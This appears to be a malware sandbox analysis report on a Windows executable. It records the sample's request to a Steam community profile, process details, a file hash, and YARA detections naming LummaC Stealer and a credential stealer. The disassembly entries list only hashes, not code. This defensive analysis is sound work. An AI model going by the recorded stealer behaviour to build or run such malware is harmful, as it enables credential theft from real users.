                                                                                                                                                                                                        Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        8192.168.2.549722104.73.234.1024438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:41 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                        2025-03-11 16:29:41 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Date: Tue, 11 Mar 2025 16:29:41 GMT
                                                                                                                                                                                                        Content-Length: 26508
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: sessionid=67aa18c404e8cbddfae059fa; Path=/; Secure; SameSite=None
                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7Cdf4d9cf365335b2c152b7982a59e4c1e; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                        2025-03-11 16:29:41 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                        2025-03-11 16:29:41 UTC12098INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                        Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:12:29:01
                                                                                                                                                                                                        Start date:11/03/2025
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\biyhoksefdad.exe"
                                                                                                                                                                                                        Imagebase:0xa80000
                                                                                                                                                                                                        File size:1'312'768 bytes
                                                                                                                                                                                                        MD5 hash:67AF8A00ABA060D6508DF2389989D85D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 00FDA8D4 Relevance: .8, Instructions: 750COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627352228.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FC9000, based on PE: false
                                                                                                                                                                                                          • Associated: 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fc7000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5f28fa0c0bdded267792985f5f09234f7fcaaa56c7868372213256238de354d7
                                                                                                                                                                                                          • Instruction ID: c6457e475ab7e4d553f92c0f5ba72cdaba7ad354718e2388ff4636366425e04b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f28fa0c0bdded267792985f5f09234f7fcaaa56c7868372213256238de354d7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96D1585585E7C45FD7239B704CA0AA97FB6AE03264B1E41C7D4E1CF2A3C1499D0AE327
                                                                                                                                                                                                          Function 01002E7B Relevance: .6, Instructions: 621COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627783526.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FF5000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ff5000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a9b0d3c5350bae6b4368c7f01934d392ff82f7f49da8acb1386df464fae7040c
                                                                                                                                                                                                          • Instruction ID: 8e721babeea3c773be6bdd04cb6248ac0802942a074a5d801e3ecaabe8f5a5eb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9b0d3c5350bae6b4368c7f01934d392ff82f7f49da8acb1386df464fae7040c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AB1A4A284E3C25FE7038B748C252917FB0AE13258B1E45DBC4D4DF4B3E2891C5AD762
                                                                                                                                                                                                          Function 00FB9E11 Relevance: .4, Instructions: 358COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627470793.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FB1000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fb1000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 14b5bce15dbd82687e6c2f8f273bde8a4a7791e674882ae09754663620918a5c
                                                                                                                                                                                                          • Instruction ID: 445b65aa0566697909fac15ae44483339c0163532ba0d1c4f7137fa04817a287
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14b5bce15dbd82687e6c2f8f273bde8a4a7791e674882ae09754663620918a5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49E1AC5144E3C11FDB178BB10DB9591BFB0AD2721071E86DFC8DA8F8A3D249980AE767
                                                                                                                                                                                                          Function 00FB9E11 Relevance: .4, Instructions: 358COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627470793.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FB3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fb1000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 14b5bce15dbd82687e6c2f8f273bde8a4a7791e674882ae09754663620918a5c
                                                                                                                                                                                                          • Instruction ID: 445b65aa0566697909fac15ae44483339c0163532ba0d1c4f7137fa04817a287
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14b5bce15dbd82687e6c2f8f273bde8a4a7791e674882ae09754663620918a5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49E1AC5144E3C11FDB178BB10DB9591BFB0AD2721071E86DFC8DA8F8A3D249980AE767
                                                                                                                                                                                                          Function 00FACBC2 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627470793.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FA3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fa3000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 11febeacde7669ff088f9f863df4787df2410adcd35d05977de99a6fbb0dab7d
                                                                                                                                                                                                          • Instruction ID: 5a56bc61c452846370ef5dac656ac267ebcd2730d5683355bab8fa4aac87ff20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11febeacde7669ff088f9f863df4787df2410adcd35d05977de99a6fbb0dab7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 947146A244E3C14FDB178B708D6A5517FB1AD1322431E86DFC4C68F4B3D359880AE7A6
                                                                                                                                                                                                          Function 00FAE5B4 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627470793.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FA3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fa3000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f8ea6655332b13ecb48c28b22838454ebf3383790405bb39110ed7f0ea888528
                                                                                                                                                                                                          • Instruction ID: 8e71f19fd844af5a526df7d74a4293ebc0f9a5e54614375e909055ddfd6bbcfd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8ea6655332b13ecb48c28b22838454ebf3383790405bb39110ed7f0ea888528
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E34137D992E7C11FDB17477429652A47F70AE2722934E8ACFC4C1CF5A3E249490AE723
                                                                                                                                                                                                          Function 00FAE5E1 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627470793.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FA3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fa3000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 38631f9b299e3044bbbc7be6418549dbd98720d5c2305472a65f311f3582c2b0
                                                                                                                                                                                                          • Instruction ID: fc26ef927f199f6ff910e03fcfc06efef4dbf718dc1fbcb8eb83945e5aa43d42
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38631f9b299e3044bbbc7be6418549dbd98720d5c2305472a65f311f3582c2b0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831F29592E7C11FDB174B7429291A17F70AE2722834E8ACFC4D1CF5A3E249580AE733
                                                                                                                                                                                                          Function 00FDAC4C Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627352228.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FC9000, based on PE: false
                                                                                                                                                                                                          • Associated: 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fc7000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 50f17dd4bfb8b3656bc2a343b8ccffa13ffaff920706ef5ea57eb4d68c3b845a
                                                                                                                                                                                                          • Instruction ID: d9c73f0a636180da2253c914cd477b7e2391b5918256df913f92c124f845ca27
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50f17dd4bfb8b3656bc2a343b8ccffa13ffaff920706ef5ea57eb4d68c3b845a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31A256C2E6C81FD7379B7448A09BA7FB6ED0337431D42C795E18A2A3D005DC09A327
                                                                                                                                                                                                          Function 0100F0A7 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627783526.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FF5000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ff5000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d2bcae00a392e354aa182a5d064101217642bec5d0d7d9b88485ae4256cdb099
                                                                                                                                                                                                          • Instruction ID: 20729ec876e4b19a153983bf656fb8657e5b730bfd11a35a51d284f9b5498d06
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2bcae00a392e354aa182a5d064101217642bec5d0d7d9b88485ae4256cdb099
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1411A0B141A385AFDF12DF78C9D1A877B61AE977147498298E8805E007D364A523CB91